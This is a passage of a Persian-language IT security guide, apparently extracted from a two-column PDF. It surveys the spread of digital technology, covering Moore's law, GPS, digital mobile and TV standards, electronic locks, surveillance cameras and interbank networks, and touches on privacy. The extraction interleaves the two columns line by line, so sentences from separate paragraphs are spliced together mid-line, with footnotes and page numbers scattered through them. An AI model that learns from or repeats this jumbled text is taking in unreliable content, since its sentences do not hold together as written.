‫ﺧﻄﻮﻁ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻧﻴـﺰ ﺩﺭ ﺍﻳـﻦ ﻣﺤـﻴﻂ ﺟﺪﻳـﺪ ﺍﻟﺰﺍﻣـﻲ‬
‫‪10‬‬ ‫‪Braga, Carlos Prima, Inclusión or Exclusion,‬‬ ‫ﺍﺳﺖ‪ .‬ﺻﻨﻌﺖ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻣﺮﻭﺯ ﺑﻪ ﺷﺪﺕ ﺩﺭ ﺗﻜﺎﭘﻮﻱ ﻳﺎﻓﺘﻦ ﺭﺍﻫﻲ‬
‫‪UNESCO Courier:‬‬
‫‪http://www.fcc.gov/Bureaus/Miscellaneous/Ne‬‬
‫ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ ﺍﻣﻨﻴــﺖ ﺯﻳﺮﺳــﺎﺧﺘﻬﺎﻱ ﺧــﻮﺩ ﻫــﺴﺘﻨﺪ‪ ،‬ﭼﺮﺍﻛــﻪ‬
‫‪ws_Releases/1997/nrmc7020.html‬‬ ‫ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺁﻥ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺖ‬
‫ﺍﻳﻦ ﻧﺮﺥ ﭘﻴﺸﺮﻓﺖ ﻓﻨﻲ ﻳﻜﻲ ﺍﺯ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻗـﺎﻧﻮﻥ ‪ Moor‬ﺍﺳـﺖ ﻛـﻪ‬ ‫‪۱۱‬‬
‫ﺑﻮﺳﻴﻠﺔ ‪ ،Gordon Moor‬ﭘﺪﺭ ﺍﻳﻨﺘﻞ ﺩﺭ ﺩﻫﺔ ‪ ۱۹۶۰‬ﺗﺸﺮﻳﺢ ﺷﺪﻩ‪ .‬ﺍﻭ‬ ‫ﻧﺎﺷﻲ ﺍﺯ ﻭﺟـﻮﺩ ﺳـﺨﺖﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻧـﺎﺍﻣﻦ ﺩﺭ ﺁﻥ‬
‫ﻣﻲﮔﻮﻳﺪ ﻃﻲ ﻫﺮ ﺩﻭﺭﺓ ‪ ۲‬ﺳـﺎﻟﻪ )ﻛـﻪ ﺑﻌـﺪﹰﺍ ﺁﻧـﺮﺍ ﺑـﻪ ‪ ۱۸‬ﻣـﺎﻩ ﻛـﺎﻫﺶ ﺩﺍﺩ(‬ ‫ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﺤﻴﻂ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨـﺎﻥ ﻭ ﺍﻋﺘﻤـﺎﺩ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪ‪،‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎﻳﻲ ﺑـﺎ ﻇﺮﻓﻴـﺖ‬
‫ﺷﺒﻜﻪ ﻭ ﺩﺍﺩﻩ ﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﺤﻴﻄـﻲ ﻛـﻪ ﺩﺭ ﺁﻥ‬
‫ﺩﻭﺑﺮﺍﺑﺮ ﻭ ﻗﻴﻤﺖ ﻳﻜﺴﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺭﻭﻧﺪ ﻃﻲ ‪ ۴۰‬ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺑﻪ‬
‫ﻫﻤﻴﻦ ﻣﻨﻮﺍﻝ ﺑﻮﺩﻩ ﻭ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺭﻭﺩ ﻛﻪ ﺣﺪﺍﻗﻞ ﺗﺎ ‪ ۱۰‬ﺳـﺎﻝ ﺩﻳﮕـﺮ ﻧﻴـﺰ‬
‫ﻫﻤﻴﻨﻄﻮﺭ ﺑﺎﺷﺪ‪.‬‬ ‫‪9‬‬ ‫‪Online‬‬
‫‪٢٩‬‬ ‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬

‫ﻋﻴﺐﻳﺎﺑﻲ ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺧﻮﺩ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ‪.‬‬ ‫ﺍﻣــﺮﻭﺯ ﺣﺘــﻲ ﻓﻴﻠﻤﻬــﺎﻱ ﺳــﻴﻨﻤﺎﻳﻲ ﻭ ﻛﺎﺭﺗﻮﻧﻬــﺎ ﻧﻴــﺰ ﺩﻳﺠﻴﺘــﺎﻟﻲ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻜﺎﻧﻴﺎﺑﻲ ﺟﻬﺎﻧﻲ )‪ ١٣(GPS‬ﻧﻴﺰ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﻣﻜـﺎﻥ‬ ‫ﺷﺪﻩﺍﻧﺪ؛ ﭼﺮﺍﻛﻪ ﺑﺪﻳﻦ ﺷﻜﻞ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺗﻮﻟﻴـﺪ ﺁﻧﻬـﺎ ﻛﻤﺘـﺮ ﻭ‬
‫ﺑﺨﺶ ﺍﻭﻝ‬

‫ﺭﺍ ﻣﻲ ﺩﻫﻨﺪ ﻛﻪ ﺑﺪﺍﻧﻴﺪ ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ ﺩﺭ ﭼـﻪ ﻣﻜـﺎﻧﻲ ﺭﻭﻱ ﻛـﺮﺓ‬ ‫ﻛﻴﻔﻴﺘﺸﺎﻥ ﺑﻴﺸﺘﺮ ﺍﺳﺖ‪ .‬ﺭﻓﺘﻪ ﺭﻓﺘﻪ ﻧﻮﺍﺭﻫﺎﻱ ﻭﻳﺪﺋﻮﻳﻲ ﺟﺎﻱ ﺧـﻮﺩ‬
‫ﺯﻣﻴﻦ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﻭ ﺑﺎ ﺩﺍﺷﺘﻦ ﭼﻨﻴﻦ ﺩﺳﺘﮕﺎﻩ ﻧﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻧـﻲ ﺩﺭ‬ ‫ﺭﺍ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ‪ DVD‬ﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻓﻴﻠﻤﻬﺎﻱ ﺳﻴﻨﻤﺎﻳﻲ ﺑـﺎ ﺍﻣﻜﺎﻧـﺎﺕ‬
‫ﻛﻨﺎﺭ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺣﺎﻭﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺍﺯ ﻧﻘﺸﻪﻫﺎ ﺑﺎﺷﺪ ﻗﺎﺩﺭ ﺑﻪ‬ ‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺳﺎﺧﺘﻪ ﻭ ﺗﺪﻭﻳﻦ ﻣﻲﮔﺮﺩﻧﺪ‪.‬‬
‫ﻳﺎﻓﺘﻦ ﻣﺴﻴﺮ ﺣﺮﻛﺖ‪ ،‬ﻧﻘﺎﻁ ﻣﻬﻢ‪ ،‬ﺭﺳﺘﻮﺭﺍﻧﻬﺎ‪ ،‬ﺗﺎﺑﻠﻮﻫـﺎﻱ ﺭﺍﻫﻨﻤـﺎ‪،‬‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﻠﻔﻨﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺩﺭﺣـﺎﻝ ﺣﺮﻛـﺖ ﺑـﻪ ﺳـﻤﺖ‬
‫ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ‪ ،‬ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﻘﺼﺪ ﻣﻮﺭﺩ ﻧﻈـﺮ‬ ‫ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻫﺴﺘﻨﺪ ﻭ ﺑﺎ ﻭﺟﻮﺩ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﭼـﻮﻥ ‪،GSM‬‬
‫ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ‪.‬‬ ‫‪ TDMA ،CDMA‬ﻭ ﮔﻮﻧﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺁﻧﻬﺎ ﺑﺘﺪﺭﻳﺞ ﺟﺎﻳﮕﺰﻳﻦ‬
‫ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺑـﺎ ﺳـﺮﻋﺘﻲ ﺑـﺎﻭﺭﻧﻜﺮﺩﻧﻲ ﺩﺭ ﺷـﺒﻜﻪ‬ ‫ﻧﺴﻞ ﻗﺪﻳﻤﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﻨـﺎﻭﺭﻱ ﺁﻧـﺎﻟﻮﮒ ﺧﻮﺍﻫﻨـﺪ ﺷـﺪ‪ .‬ﺩﺭ‬
‫ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻗﺎﺩﺭ ﺑـﻪ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ‬ ‫ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺗﻠﻮﻳﺰﻳﻮﻥ ﺩﻳﺠﻴﺘﺎﻝ ﺑﻪ ﺻﺤﻨﻪ ﺁﻣﺪﻩ ﺍﺳﺖ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻫﺴﺘﻨﺪ ﻭ ﺍﺑﺘﺪﺍ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺳﺎﻝ ﺻﻮﺕ ﻭ ﺍﻛﻨﻮﻥ ﻗـﺎﺩﺭ ﺑـﻪ‬ ‫ﻭ ﺩﻳﺮﻱ ﻧﺨﻮﺍﻫﺪ ﮔﺬﺷﺖ ﻛﻪ ﺟﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﭘﺨﺶ ﺑﺮﻧﺎﻣـﻪ‬
‫ﻣﺒﺎﺩﻟﺔ ﺗﺼﺎﻭﻳﺮ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﻣـﻲ ﺑﺎﺷـﻨﺪ ﻭ ﺑـﺰﻭﺩﻱ ﺩﺍﺭﺍﻱ‬ ‫ﺭﺍ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ )ﻫﺮﭼﻨﺪ ﻛﻪ ﺍﻳﻦ ﺗﻐﻴﻴﺮ ﻛﻤﻲ ﻛﻨﺪﺗﺮ ﺍﺯ ﺑﻘﻴﻪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ؛‬
‫ﻗﺎﺑﻠﻴﺖ ‪ GPS‬ﻧﻴﺰ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﺍﻓﺮﺍﺩﻱ ﻛـﻪ ﺩﺭ‬ ‫ﭼﺮﺍﻛﻪ ﺣﺠﻢ ﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻣﻮﺟﻮﺩ ﻛﻪ ﺑـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ‬
‫ﻣﻌﺮﺽ ﺧﻄﺮ ﻭ ﺣﺎﺩﺛﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺎ ﺩﻗﺘـﻲ‬ ‫ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻭﺳﻴﻊ ﺍﺳﺖ(‪.‬‬
‫ﺯﻳﺎﺩ ﻭ ﺗﻨﻬﺎ ﺑﺎ ﻳﻚ ﺗﻠﻔﻦ ﻣﻜﺎﻧﻴﺎﺑﻲ ﻛﺮﺩ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺗﻲ ﻛـﻪ‬ ‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﻧﻴــﺰ ﺩﺭﺣــﺎﻝ ﺗﺒــﺪﻳﻞ ﺑــﻪ ﺍﻧــﻮﺍﻉ‬
‫ﺍﻛﻨﻮﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺎ ﻗﺮﺍﺭ ﻣـﻲ ﮔﻴﺮﻧـﺪ ‪ -‬ﻣﺜـﻞ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻫﺘﻠﻬﺎ‪ ،‬ﺁﭘﺎﺭﺗﻤﺎﻧﻬـﺎ ﻭ ﺩﻓـﺎﺗﺮ ﺍﺩﺍﺭﻱ‪،‬‬
‫ﺧﻮﺩﭘﺮﺩﺍﺯ ﻛﻪ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ ‪-‬‬ ‫ﻛﻠﻴﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﺟـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ ﻛﺎﺭﺗﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺑﺮ ﺍﺳﺎﺱ ﺍﺻﻞ "ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺷﺒﻜﻪ" ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻧﻘـﻞ ﻭ‬ ‫ﺩﺍﺩﻩ ﺍﻧﺪ‪ .‬ﺩﻭﺭﺑﻴﻨﻬﺎﻱ ﺗﻠﻮﻳﺰﻳﻮﻧﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺍﻧﺘﻘﺎﻻﺕ ﻣﺎﻟﻲ ﻭ ﺍﻋﺘﺒﺎﺭﻱ ﻣﻴﺎﻥﺑﺎﻧﻜﻲ ﻭ ﺑـﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﻭﺍﺑـﺴﺘﮕﻲ‬ ‫ﻧﻈــﺎﺭﺗﻲ ﺳــﺎﺧﺘﻤﺎﻧﻬﺎ ﻭ ﺗﺄﺳﻴــﺴﺎﺕ ﻧﻴــﺰ ﺍﻏﻠــﺐ ﺍﺯ ﺗﺠﻬﻴــﺰﺍﺕ‬
‫ﺯﻳﺎﺩﻱ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﻣﺎﻟﻲ ﺩﺍﺭﻧـﺪ‪ ١٤.‬ﺍﻣـﺮﻭﺯﻩ ﻧﻘـﻞ ﻭ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ ﻛـﻪ ﺑﺠـﺎﻱ ﺍﺭﺳـﺎﻝ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ‬
‫ﺍﻧﺘﻘﺎﻻﺕ ﺑﺎﻧﻜﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ‬ ‫ﺗﻠﻮﻳﺰﻳﻮﻧﻲ ﺑﻪ ﻳﻚ ﻣﺎﻧﻴﺘﻮﺭ ﻭﻳﺪﺋﻮﻳﻲ‪ ،‬ﺗﺼﺎﻭﻳﺮ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺑـﻪ‬
‫ﻣﻴﺴﺮ ﺍﺳﺖ‪.‬‬ ‫‪١٢‬‬
‫ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻲ ﺩﻳﺠﻴﺘﺎﻝ ﻭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ‬ ‫ﺗﻮﺳﻌﺔ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ‬ ‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨـﻴﻢ ﺑـﺪﻭﻥ‬
‫ﻫﻢ ﻓﻮﺍﻳﺪ ﺑـﺴﻴﺎﺭﻱ ﺩﺍﺭﺩ؛ ﻭﻟـﻲ ﻧﻜـﺎﺕ ﻣﻨﻔـﻲ ﻧﻴـﺰ ﺩﺭ ﺁﻥ ﻗﺎﺑـﻞ‬ ‫ﻭﺟﻮﺩ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺷﺒﻜﻪ ﻭ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻗﺎﺑﻞ ﺍﺭﺍﺋﻪ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬
‫ﻣﺸﺎﻫﺪﻩ ﺍﺳﺖ‪ .‬ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻣﺤﻞ ﺍﺳﺘﻘﺮﺍﺭ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺁﺳﺎﻧﺘﺮ‬ ‫ﺧﻄــﻮﻁ ﻫــﻮﺍﻳﻲ ﻧﻴــﺰ ﺑــﺪﻭﻥ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺯﺭﻭ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﻳـﺪﻥ ﺻـﻔﺤﺎﺕ ﺗﺒﻠﻴﻐـﺎﺗﻲ ﻭﺏ‪ ،‬ﻳـﺎﻓﺘﻦ ﺁﻧﭽـﻪ ﻛـﻪ‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﺮﻭﺍﺯ ﻗﺎﺩﺭ ﺑﻪ ﺭﻗﺎﺑﺖ ﺑـﺎ ﻫـﻢ‬
‫ﺑﺪﻧﺒﺎﻝ ﺧﺮﻳﺪ ﺁﻥ ﺩﺭ ﻣﻐـﺎﺯﻩﻫـﺎ ﻫـﺴﺘﻴﺪ‪ ،‬ﻭ ﻣـﺸﺎﻫﺪﺓ ﺁﻧﭽـﻪ ﻛـﻪ‬ ‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﻫﻮﺍﭘﻴﻤﺎﻫﺎ ﺗﺎ ﺍﻧﺪﺍﺯﺓ ﺯﻳﺎﺩﻱ ﺑﻪ ﺣﺴﮕﺮﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ‬
‫ﺩﺭﺣﺎﻝ ﺗﻤﺎﺷﺎ ﻳﺎ ﺧﻮﺍﻧﺪﻥ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ﻫﺴﺘﻴﺪ ﻧﻴﺰ ﺳـﺎﺩﻩﺗـﺮ ﺍﺯ‬ ‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﻭ ﺑﺪﻭﻥ ﺁﻧﻬﺎ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺧﻮﺑﻲ‬
‫ﻗﺒﻞ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﭼﻨﻴﻦ ﻧﻈﺎﺭﺗﻲ ﺑـﺮ ﻣﻨـﺎﻓﻊ ﺷـﻤﺎ ﺣـﺎﻛﻢ ﺑﺎﺷـﺪ‬ ‫ﻛﺎﺭ ﻛﻨﻨﺪ‪ .‬ﺣﺘﻲ ﺍﺗﻮﻣﺒﻴﻠﻬﺎ ﻧﻴﺰ ﺑﺮﺍﻱ ﻋﻤﻠﻜﺮﺩ ﻣﻨﺎﺳﺐ ﻭ ﻛﻤﻚ ﺑـﻪ‬
‫ﻗﺎﻋﺪﺗﹰﺎ ﺷـﻤﺎ ﺍﺯ ﺁﻥ ﺑـﺎﺧﺒﺮ ﻧﺨﻮﺍﻫﻴـﺪ ﺷـﺪ‪ ،‬ﺍﻣـﺎ ﺷـﺎﻳﺪ ﺑﺨﻮﺍﻫﻴـﺪ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﭼﻨـﻴﻦ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺑـﺎ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ ﺷـﻤﺎ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﺷﻮﻧﺪ ﻭ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻓﻲ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﻧـﺪ ﻛـﻪ ﺍﺯ‬ ‫اﻳﻦ ﻣﻮﺭﺩ ﺧﺎﺹ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﺎﻏﻞ ﺭﺍ ﺑﻪ ﺳﻤﺖ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ‬ ‫‪۱۲‬‬
‫ﺗﻮﺳﻌﻪ ﻫﺪﺍﻳﺖ ﻛﻨﺪ‪ .‬ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺗﺼﺎﻭﻳﺮ ﺩﺭ ﻗﺎﻟﺐ ﺩﻳﺠﻴﺘﺎﻝ ﺩﺭﺁﻳﻨﺪ‬
‫ﻭ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﻮﻧﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻈـﺎﺭﺕ ﺩﺭ‬
‫‪13‬‬ ‫‪Global Positioning System‬‬ ‫ﻫﺮ ﻛﺠﺎﻱ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﻧﺪ‪ .‬ﺑﻨﺎﺑﺮ ﭘﻴﺶﺑﻴﻨﻲﻫﺎ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﻣﻨﻴﺘﻲ‬
‫ﺷﺒﻜﺔ ﺗﺒﺎﺩﻝ ﻣﺎﻟﻲ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﮔﺬﺷﺘﻪ ﺍﺯ ﻳـﻚ ﺷـﺒﻜﺔ ﺍﺧﺘـﺼﺎﺻﻲ‬ ‫‪۱۴‬‬ ‫ﻛﻪ ﺑﻪ ﻣﻬﺎﺭﺕ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‬
‫ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﻛﻪ ﺑﺮﺍﻱ ﻫﻤﻴﻦ ﻫﺪﻑ ﺧﺎﺹ ﻃﺮﺍﺣﻲ ﺷـﺪﻩ ﺑـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﺑﺎ ﻫﺰﻳﻨﺔ ﻛﻤﺘﺮ ﻭ ﻛﻴﻔﻴﺖ ﺑﺮﺍﺑﺮ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﻮﺩ‪ .‬ﺍﻳـﻦ ﭘﻴـﺸﻨﻬﺎﺩ ﺩﺭ ﺑـﺎ‬
‫ﻣﻲﻛﺮﺩ ﻭ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﻣﺘﺼﻞ ﻧﺒﻮﺩ‪ .‬ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ‬ ‫ﺍﺳﺘﻘﺒﺎﻝ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻣﻮﺍﺟﻪ ﺷـﺪ‪ ،‬ﺍﻣـﺎ ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻧـﻮﻉ‬
‫ﺍﺭﺯﺵ ﺯﻳﺎﺩ ﺁﻥ ﺷﺒﻜﻪ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﺑﺴﻴﺎﺭ ﻣﺨﺮﺏ ﻭ ﺟﺪﻱ ﻫﺮﮔﻮﻧـﻪ ﻧﻔـﻮﺫ‬ ‫ﻭﺍﮔﺬﺍﺭﻱ ﻣﺮﺯﻫﺎﻱ ﻣﻠﻲ ﺩﺭ ﻧﻮﺭﺩﻳﺪﻩ ﻣـﻲﺷـﻮﻧﺪ‪ ،‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺮﺧـﻲ‬
‫ﻼ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ‪.‬‬ ‫ﺑﻪ ﺁﻥ ﻛﺎﻣ ﹰ‬ ‫ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٠‬‬

‫ﺍﺭﺯﺷﻤﻨﺪ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻣﺆﺳﺴﺎﺕ ﭼﻨﺪﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﻧﻤﻲﺑﺎﺷـﺪ‪ .‬ﺍﺯ‬ ‫ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺭﻳﺪ ﻭ ﺑﺎ ﺁﻥ ﻣﻮﺍﻓﻖ ﻫﺴﺘﻴﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺩﻡ ﺑـﺮﺍﻱ‬
‫ﺩﻳﮕﺮ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﺎﺷﺪ ﺁﻧـﺴﺖ ﻛـﻪ ﺗـﺄﺛﻴﺮ‬ ‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﻗﺎﺋﻞ ﻫﺴﺘﻨﺪ ﻭ ﺩﻭﻟﺘﻬﺎ ﻧﻴـﺰ‬
